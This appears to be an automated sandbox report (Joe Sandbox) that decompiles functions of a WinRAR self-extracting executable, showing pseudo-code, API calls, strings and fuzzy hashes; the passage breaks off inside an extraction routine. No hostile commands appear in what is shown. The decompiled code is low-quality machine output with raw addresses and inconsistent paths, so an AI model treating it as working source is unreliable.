Function 00E7D891 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E00E7D891(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a84, void* _a86, void* _a90, void* _a92, void* _a94, void* _a96, void* _a98, void* _a100, void* _a104, void* _a144, void* _a148, void* _a196) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				void* _t42;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t94;
				struct HINSTANCE__* _t95;
				intOrPtr _t96;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t121;

				_t121 = __fp0;
				_t99 = __ebp;
				_t88 = __edx;
				E00E703AA(__edx, 1);
				E00E7A004("C:\Users\hardz\Desktop", 0x800);
				E00E7A5C6( &_v208); // executed
				E00E716CB(0xea81e0);
				_t74 = 0;
				E00E7F5F0(0x7104, 0xeb6b80, 0, 0x7104);
				_t102 = _t101 + 0xc;
				_t94 = GetCommandLineW();
				_t106 = _t94;
				if(_t94 != 0) {
					_push(_t94);
					E00E7BF14(0, _t106);
					if( *0xeaa471 == 0) {
						E00E7D544(__eflags, _t94); // executed
					} else {
						_push(__ebp);
						_t100 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t100 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t100);
						_pop(_t99);
					}
				}
				GetModuleFileNameW(_t74, 0xebdc90, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0xebdc90); // executed
				GetLocalTime(_t102 + 0xc);
				_push( *(_t102 + 0x1a) & 0x0000ffff);
				_push( *(_t102 + 0x1c) & 0x0000ffff);
				_push( *(_t102 + 0x1e) & 0x0000ffff);
				_push( *(_t102 + 0x20) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				E00E63F8F(_t102 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t102 + 0x24) & 0x0000ffff);
				_t103 = _t102 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t103 + 0x7c);
				_t95 = GetModuleHandleW(_t74);
				 *0xea0ed4 = _t95;
				 *0xea0ed0 = _t95; // executed
				_t41 = LoadIconW(_t95, 0x64); // executed
				 *0xeac574 = _t41; // executed
				_t42 = E00E7B07D(0xea81e0, _t88, _t121); // executed
				 *0xeb6b7c = _t42;
				E00E6D5DC(0xea0ee8, _t88, _t99, 0xebdc90);
				E00E78A75(0);
				E00E78A75(0);
				 *0xea8440 = _t103 + 0x5c;
				 *0xea8444 = _t103 + 0x30; // executed
				DialogBoxParamW(_t95, L"STARTDLG", _t74, E00E7B170, _t74); // executed
				 *0xea8444 = _t74;
				 *0xea8440 = _t74;
				E00E78B33(_t103 + 0x24);
				E00E78B33(_t103 + 0x50);
				_t51 =  *0xebeca0;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0xea9468 != 0) {
					E00E7A7D4(0xebdc90);
				}
				E00E6EE02(0xeb6a78);
				if( *0xea843c > 0) {
					L00E7E7FC( *0xea8438);
				}
				DeleteObject( *0xeac574);
				_t54 =  *0xeb6b7c;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0xea0f50 == 0 &&  *0xea8450 != 0) {
					E00E66FBA(0xea0f50, 0xff);
				}
				_t55 =  *0xebeca4;
				 *0xea8450 = 1;
				if( *0xebeca4 != 0) {
					E00E7D5A3(_t55);
					CloseHandle( *0xebeca4);
				}
				_t96 =  *0xea0f50; // 0x0
				if( *0xebec99 != 0) {
					_t58 =  *0xe9e5fc; // 0x3e8
					if( *0xebec9a == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t96 = _t96 - _t58;
							__eflags = _t96;
						}
					} else {
						_t96 =  *0xebec9c;
						if(_t58 > 0) {
							_t96 = _t96 + _t58;
						}
					}
				}
				E00E7A62E(_t103 + 0x1c); // executed
				return _t96;
			}

0x00e7d891
0x00e7d891
0x00e7d891
0x00e7d89c
0x00e7d8ab
0x00e7d8b4
0x00e7d8be
0x00e7d8c8
0x00e7d8d1
0x00e7d8d6
0x00e7d8df
0x00e7d8e1
0x00e7d8e3
0x00e7d8e5
0x00e7d8e6
0x00e7d8f1
0x00e7d95e
0x00e7d8f3
0x00e7d8f3
0x00e7d906
0x00e7d90a
0x00e7d94b
0x00e7d951
0x00e7d951
0x00e7d954
0x00e7d95a
0x00e7d95a
0x00e7d8f1
0x00e7d96f
0x00e7d97b
0x00e7d986
0x00e7d991
0x00e7d997
0x00e7d99d
0x00e7d9a3
0x00e7d9a9
0x00e7d9af
0x00e7d9c5
0x00e7d9ca
0x00e7d9d7
0x00e7d9e4
0x00e7d9e9
0x00e7d9ef
0x00e7d9f5
0x00e7d9fb
0x00e7da00
0x00e7da0b
0x00e7da10
0x00e7da19
0x00e7da22
0x00e7da32
0x00e7da41
0x00e7da46
0x00e7da50
0x00e7da56
0x00e7da5c
0x00e7da65
0x00e7da6a
0x00e7da71
0x00e7da74
0x00e7da74
0x00e7da81
0x00e7da83
0x00e7da83
0x00e7da8d
0x00e7da99
0x00e7daa1
0x00e7daa6
0x00e7daad
0x00e7dab3
0x00e7daba
0x00e7dabd
0x00e7dabd
0x00e7daca
0x00e7dadf
0x00e7dadf
0x00e7dae4
0x00e7dae9
0x00e7daf2
0x00e7daf5
0x00e7db00
0x00e7db00
0x00e7db0d
0x00e7db13
0x00e7db1c
0x00e7db21
0x00e7db31
0x00e7db33
0x00e7db35
0x00e7db35
0x00e7db35
0x00e7db23
0x00e7db23
0x00e7db2b
0x00e7db2d
0x00e7db2d
0x00e7db2b
0x00e7db21
0x00e7db3b
0x00e7db4b

APIs

Part of subcall function 00E703AA: GetModuleHandleW.KERNEL32(kernel32), ref: 00E703BF
Part of subcall function 00E703AA: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E703D1
Part of subcall function 00E703AA: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E70402

Part of subcall function 00E7A004: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00E7A00C

Part of subcall function 00E7A5C6: OleInitialize.OLE32(00000000), ref: 00E7A5DF
Part of subcall function 00E7A5C6: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E7A616
Part of subcall function 00E7A5C6: SHGetMalloc.SHELL32(00EA8430), ref: 00E7A620

Part of subcall function 00E716CB: GetCPInfo.KERNEL32(00000000,?), ref: 00E716DC
Part of subcall function 00E716CB: IsDBCSLeadByte.KERNEL32(00000000), ref: 00E716F0

GetCommandLineW.KERNEL32 ref: 00E7D8D9
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00E7D900
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00E7D911
UnmapViewOfFile.KERNEL32(00000000), ref: 00E7D94B

Part of subcall function 00E7D544: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00E7D55A
Part of subcall function 00E7D544: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E7D596

CloseHandle.KERNEL32(00000000), ref: 00E7D954
GetModuleFileNameW.KERNEL32(00000000,00EBDC90,00000800), ref: 00E7D96F
SetEnvironmentVariableW.KERNELBASE(sfxname,00EBDC90), ref: 00E7D97B
GetLocalTime.KERNEL32(?), ref: 00E7D986
_swprintf.LIBCMT ref: 00E7D9C5
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00E7D9D7
GetModuleHandleW.KERNEL32(00000000), ref: 00E7D9DE
LoadIconW.USER32(00000000,00000064), ref: 00E7D9F5
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B170,00000000), ref: 00E7DA46
Sleep.KERNEL32(?), ref: 00E7DA74
DeleteObject.GDI32 ref: 00E7DAAD
DeleteObject.GDI32(?), ref: 00E7DABD
CloseHandle.KERNEL32 ref: 00E7DB00

Strings

xj, xrefs: 00E7DA88
sfxname, xrefs: 00E7D976
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00E7D9B6
STARTDLG, xrefs: 00E7DA3B
sfxstime, xrefs: 00E7D9D2
C:\Users\user\Desktop, xrefs: 00E7D8A6
winrarsfxmappingfile.tmp, xrefs: 00E7D8F4

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj
API String ID: 788466649-2892065590
Opcode ID: 498afea4b3e3be19bb4623996f732d950c25e5e41960b93869fe6c841c2598a1
Instruction ID: 5e06b510ec7620033ae43a63c86769feb976e5d224f7badf82a773a4e8d53239
Opcode Fuzzy Hash: 498afea4b3e3be19bb4623996f732d950c25e5e41960b93869fe6c841c2598a1
Instruction Fuzzy Hash: 3161F771908340AFD711AB72EC4AE6B7BFCFF49744F04A42AF549B22A1DB749908C761

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A07C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00E7A07C(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				struct HRSRC__* _t14;
				char _t16;
				void* _t17;
				void* _t18;
				intOrPtr* _t26;
				char* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				long _t44;
				intOrPtr* _t46;
				struct HRSRC__* _t47;

				_t14 = FindResourceW( *0xea0ed0, _a4, "PNG");
				_t47 = _t14;
				if(_t47 == 0) {
					return _t14;
				}
				_t44 = SizeofResource( *0xea0ed0, _t47);
				if(_t44 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0xea0ed0, _t47);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t48 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t35 = GlobalAlloc(2, _t44);
					if(_t35 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t35) == 0) {
						L14:
						GlobalFree(_t35);
						goto L15;
					}
					E00E7F750(_t20, _t48, _t44);
					_v8 = 0;
					_push( &_v8);
					_push(0);
					_push(_t35);
					if( *0xec217c() == 0) {
						_t26 = E00E79FDB(_t24, _t37, _v20, 0); // executed
						_t38 = _v28;
						_t46 = _t26;
						 *0xe93260(_t38);
						 *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
						if(_t46 != 0) {
							 *((intOrPtr*)(_t46 + 8)) = 0;
							if( *((intOrPtr*)(_t46 + 8)) == 0) {
								_push(0xffffff);
								_t33 =  &_v20;
								_push(_t33);
								_push( *((intOrPtr*)(_t46 + 4)));
								L00E7E500(); // executed
								if(_t33 != 0) {
									 *((intOrPtr*)(_t46 + 8)) = _t33;
								}
							}
							 *0xe93260(1);
							 *((intOrPtr*)( *((intOrPtr*)( *_t46))))();
						}
					}
					GlobalUnlock(_t35);
					goto L14;
				}
				goto L4;
			}

0x00e7a08e
0x00e7a094
0x00e7a098
0x00e7a192
0x00e7a192
0x00e7a0ac
0x00e7a0b0
0x00e7a0d0
0x00e7a0d0
0x00e7a18e
0x00000000
0x00e7a18e
0x00e7a0b9
0x00e7a0c1
0x00000000
0x00000000
0x00e7a0c4
0x00e7a0ca
0x00e7a0ce
0x00e7a0de
0x00e7a0e8
0x00e7a0ec
0x00e7a188
0x00e7a188
0x00000000
0x00e7a18d
0x00e7a0fb
0x00e7a181
0x00e7a182
0x00000000
0x00e7a182
0x00e7a104
0x00e7a10c
0x00e7a114
0x00e7a115
0x00e7a116
0x00e7a11f
0x00e7a126
0x00e7a12b
0x00e7a12f
0x00e7a139
0x00e7a13f
0x00e7a143
0x00e7a148
0x00e7a14d
0x00e7a14f
0x00e7a154
0x00e7a158
0x00e7a159
0x00e7a15c
0x00e7a163
0x00e7a165
0x00e7a165
0x00e7a163
0x00e7a170
0x00e7a178
0x00e7a178
0x00e7a143
0x00e7a17b
0x00000000
0x00e7a17b
0x00000000

APIs

FindResourceW.KERNEL32(00E7B0DD,PNG,?,?,?,00E7B0DD,00000066), ref: 00E7A08E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,00E7B0DD,00000066), ref: 00E7A0A6
LoadResource.KERNEL32(00000000,?,?,?,00E7B0DD,00000066), ref: 00E7A0B9
LockResource.KERNEL32(00000000,?,?,?,00E7B0DD,00000066), ref: 00E7A0C4
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00E7B0DD,00000066), ref: 00E7A0E2
GlobalLock.KERNEL32 ref: 00E7A0F3
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E7A15C
GlobalUnlock.KERNEL32(00000000), ref: 00E7A17B
GlobalFree.KERNEL32 ref: 00E7A182

Strings

PNG, xrefs: 00E7A07F

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: c74e6f3718e4a741e8fc2a76aa25a92ed7e8cd31114480a6f28f9e90624c02a9
Instruction ID: 980fcb6adf8bed8372dab6b1b19333bafe9b95df0c244393da95ea34e0d1bcf0
Opcode Fuzzy Hash: c74e6f3718e4a741e8fc2a76aa25a92ed7e8cd31114480a6f28f9e90624c02a9
Instruction Fuzzy Hash: A3319571201306AFD7205F32DC4892FBBA9FF85755B04952AF909F3260EB31DC05DA61

Uniqueness

Uniqueness Score: -1.00%

Function 00E6A7E7 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00E6A7E7(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				signed int _t74;
				void* _t75;
				void* _t81;
				intOrPtr _t83;
				void* _t86;

				_t81 = __edx;
				E00E7E630();
				_push(_t74);
				_t86 = _a4692;
				_t83 = _a4700;
				_t75 = _t74 | 0xffffffff;
				_push( &_v0);
				if(_t86 != _t75) {
					_t43 = FindNextFileW(_t86, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t86 = _t75;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t83 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t86 - _t75;
					if(_t86 != _t75) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t86 = _t65;
					if(_t86 != _t75) {
						L13:
						E00E70131(_t83, _a4696, 0x800);
						_push(0x800);
						E00E6BEFF(__eflags, _t83,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t83 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t83 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t83 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t83 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t83 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t83 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t83 + 0x1038)) = _v4;
						 *(_t83 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t83 + 0x1004)) = _a4;
						E00E710E9(_t83 + 0x1010, _t81,  &_v4);
						E00E710E9(_t83 + 0x1018, _t81,  &_v24);
						E00E710E9(_t83 + 0x1020, _t81,  &_v20);
					} else {
						if(E00E6B85C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t83 + 0x1044)) = _t69;
						} else {
							_t86 = FindFirstFileW( &_a592,  &_v0);
							if(_t86 != _t75) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t83 + 0x1040) =  *(_t83 + 0x1040) & 0x00000000;
				return _t86;
			}

0x00e6a7e7
0x00e6a7ec
0x00e6a7f1
0x00e6a7f4
0x00e6a800
0x00e6a807
0x00e6a80f
0x00e6a812
0x00e6a885
0x00e6a88b
0x00e6a88d
0x00e6a88f
0x00e6a891
0x00e6a897
0x00e6a89a
0x00e6a89a
0x00e6a89d
0x00e6a89d
0x00e6a8a3
0x00e6a8a5
0x00000000
0x00000000
0x00e6a814
0x00e6a81b
0x00e6a821
0x00e6a825
0x00e6a8ab
0x00e6a8b4
0x00e6a8b9
0x00e6a8c0
0x00e6a8cb
0x00e6a8cb
0x00e6a8cf
0x00e6a8d9
0x00e6a8dc
0x00e6a8e6
0x00e6a8f0
0x00e6a8fa
0x00e6a904
0x00e6a90e
0x00e6a918
0x00e6a922
0x00e6a92f
0x00e6a93f
0x00e6a94f
0x00e6a82b
0x00e6a842
0x00e6a85d
0x00e6a85d
0x00e6a866
0x00e6a877
0x00e6a877
0x00e6a872
0x00e6a874
0x00e6a874
0x00e6a879
0x00e6a844
0x00e6a857
0x00e6a85b
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6a85b
0x00e6a842
0x00e6a825
0x00e6a954
0x00e6a967

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E6A6E2,000000FF,?,?), ref: 00E6A81B
FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00E6A6E2,000000FF,?,?), ref: 00E6A851
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E6A6E2,000000FF,?,?), ref: 00E6A85D
FindNextFileW.KERNEL32(?,?,?,?,?,?,00E6A6E2,000000FF,?,?), ref: 00E6A885
GetLastError.KERNEL32(?,?,?,?,00E6A6E2,000000FF,?,?), ref: 00E6A891

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 29fb0afe1c1bd7821f51bcdfac086b237da3917eafad7eeddab16c8a64039d23
Instruction ID: 9cc4c21025d7423a173e3fd82d82918ffcf22fd61c7ec50628e3a75a2b252c78
Opcode Fuzzy Hash: 29fb0afe1c1bd7821f51bcdfac086b237da3917eafad7eeddab16c8a64039d23
Instruction Fuzzy Hash: 1C416672504241AFC324EF74D884ADAF7E8BF48354F044A2AF599F3201D734A959CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00E8780E Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00E8780E(int _a4) {
				void* _t14;
				void* _t16;

				if(E00E8AB46(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00E87893(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x00e8781a
0x00e87836
0x00e87836
0x00e8783f
0x00e87848

APIs

GetCurrentProcess.KERNEL32(?,?,00E877E4,?,00E9BAD8,0000000C,00E8793B,?,00000002,00000000), ref: 00E8782F
TerminateProcess.KERNEL32(00000000,?,00E877E4,?,00E9BAD8,0000000C,00E8793B,?,00000002,00000000), ref: 00E87836
ExitProcess.KERNEL32 ref: 00E87848

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 61f7aa1e5318afa0458863b2c5571135f1f85861150ed4d0787023dea701bf0b
Instruction ID: bdccd29270529b529d62acc2568b061ab5f04f37a92cf19046ccddd2acf1bfe7
Opcode Fuzzy Hash: 61f7aa1e5318afa0458863b2c5571135f1f85861150ed4d0787023dea701bf0b
Instruction Fuzzy Hash: 1AE04631000218AFCF01BF65DD0CA4A3F6AEB00341B104026FC4CAA132CB35DE42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E68709 Relevance: 3.9, APIs: 2, Instructions: 948
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00E68709(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t372;
				signed int _t376;
				signed int _t377;
				signed int _t382;
				signed int _t388;
				void* _t390;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t401;
				signed int _t406;
				signed int _t407;
				signed int _t411;
				signed int _t421;
				signed int _t422;
				signed int _t425;
				signed int _t426;
				signed int _t435;
				char _t437;
				char _t439;
				signed int _t440;
				signed int _t441;
				signed int _t464;
				signed int _t473;
				intOrPtr _t476;
				char _t483;
				signed int _t484;
				void* _t495;
				void* _t503;
				void* _t505;
				signed int _t515;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t524;
				signed int _t527;
				signed int _t535;
				signed int _t545;
				signed int _t547;
				signed int _t549;
				signed int _t551;
				signed char _t552;
				signed int _t555;
				void* _t560;
				signed int _t568;
				intOrPtr* _t579;
				intOrPtr _t581;
				signed int _t582;
				signed int _t592;
				intOrPtr _t595;
				signed int _t598;
				signed int _t607;
				signed int _t614;
				signed int _t616;
				signed int _t617;
				signed int _t620;
				signed int _t638;
				signed int _t639;
				void* _t646;
				void* _t647;
				signed int _t663;
				signed int _t674;
				intOrPtr _t675;
				void* _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t682;
				signed int _t688;
				intOrPtr _t690;
				signed int _t695;
				intOrPtr _t697;
				signed int _t700;
				signed int _t705;
				void* _t709;
				void* _t711;
				void* _t713;

				_t581 = __ecx;
				E00E7E554(E00E92124, _t709);
				E00E7E630();
				_t579 =  *((intOrPtr*)(_t709 + 8));
				_t673 = 0;
				_t690 = _t581;
				 *((intOrPtr*)(_t709 - 0x20)) = _t690;
				_t372 =  *( *(_t690 + 8) + 0x82fa) & 0x0000ffff;
				 *(_t709 - 0x18) = _t372;
				if( *((intOrPtr*)(_t709 + 0xc)) != 0) {
					L6:
					_t697 =  *((intOrPtr*)(_t579 + 0x21dc));
					__eflags = _t697 - 2;
					if(_t697 == 2) {
						 *(_t690 + 0x10f7) = _t673;
						__eflags =  *(_t579 + 0x32dc) - _t673;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t579 + 0x32e4) - _t673;
							if(__eflags > 0) {
								L26:
								_t582 =  *(_t690 + 8);
								__eflags =  *((intOrPtr*)(_t582 + 0x6160)) - _t673;
								if( *((intOrPtr*)(_t582 + 0x6160)) != _t673) {
									L29:
									 *(_t709 - 0x13) = _t673;
									_t35 = _t709 - 0x51ac; // -18860
									_t36 = _t709 - 0x13; // 0x7ed
									_t376 = E00E65DBA(_t579 + 0x2280, _t36, 6, _t673, _t35, 0x800);
									__eflags = _t376;
									_t377 = _t376 & 0xffffff00 | _t376 != 0x00000000;
									 *(_t709 - 0x12) = _t377;
									__eflags = _t377;
									if(_t377 != 0) {
										__eflags =  *(_t709 - 0x13);
										if( *(_t709 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t690 + 0xf1)) = 0;
										}
									}
									E00E61FF6(_t579);
									_push(0x800);
									_t43 = _t709 - 0x113c; // -2364
									_push(_t579 + 0x22a8);
									E00E6B4D3();
									__eflags =  *((char*)(_t579 + 0x3373));
									 *(_t709 - 0x1c) = 1;
									if( *((char*)(_t579 + 0x3373)) == 0) {
										_t382 = E00E620E0(_t579);
										__eflags = _t382;
										if(_t382 == 0) {
											_t552 =  *(_t690 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t552 + 0x72c4));
											asm("sbb al, al");
											_t61 = _t709 - 0x12;
											 *_t61 =  *(_t709 - 0x12) &  !_t552;
											__eflags =  *_t61;
										}
									} else {
										_t555 =  *( *(_t690 + 8) + 0x72c4);
										__eflags = _t555 - 1;
										if(_t555 != 1) {
											__eflags =  *(_t709 - 0x13);
											if( *(_t709 - 0x13) == 0) {
												__eflags = _t555;
												 *(_t709 - 0x12) =  *(_t709 - 0x12) & (_t555 & 0xffffff00 | _t555 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t709 - 0x113c; // -2364
												_t560 = E00E6BE38(_t54);
												_t663 =  *(_t690 + 8);
												__eflags =  *((intOrPtr*)(_t663 + 0x72c4)) - 1 - _t560;
												if( *((intOrPtr*)(_t663 + 0x72c4)) - 1 != _t560) {
													 *(_t709 - 0x12) = 0;
												} else {
													_t57 = _t709 - 0x113c; // -2364
													_push(1);
													E00E6BE38(_t57);
												}
											}
										}
									}
									 *((char*)(_t690 + 0x5f)) =  *((intOrPtr*)(_t579 + 0x3319));
									 *((char*)(_t690 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *0xe93260( *((intOrPtr*)(_t579 + 0x6ca8)) -  *(_t579 + 0x32d8),  *((intOrPtr*)(_t579 + 0x6cac)), 0);
									 *((intOrPtr*)( *_t579 + 0x10))();
									_t674 = 0;
									_t388 = 0;
									 *(_t709 - 0xe) = 0;
									 *(_t709 - 0x24) = 0;
									__eflags =  *(_t709 - 0x12);
									if( *(_t709 - 0x12) != 0) {
										L43:
										_t700 =  *(_t709 - 0x18);
										_t592 =  *((intOrPtr*)( *(_t690 + 8) + 0x6201));
										_t390 = 0x49;
										__eflags = _t592;
										if(_t592 == 0) {
											L45:
											_t391 = _t674;
											L46:
											__eflags = _t592;
											_t83 = _t709 - 0x113c; // -2364
											_t395 = L00E7168D(_t592, _t83, (_t391 & 0xffffff00 | _t592 == 0x00000000) & 0x000000ff, _t391,  *(_t709 - 0x24)); // executed
											__eflags = _t395;
											if(__eflags == 0) {
												L219:
												_t396 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t709 - 0xc));
												return _t396;
											}
											_push(0x800);
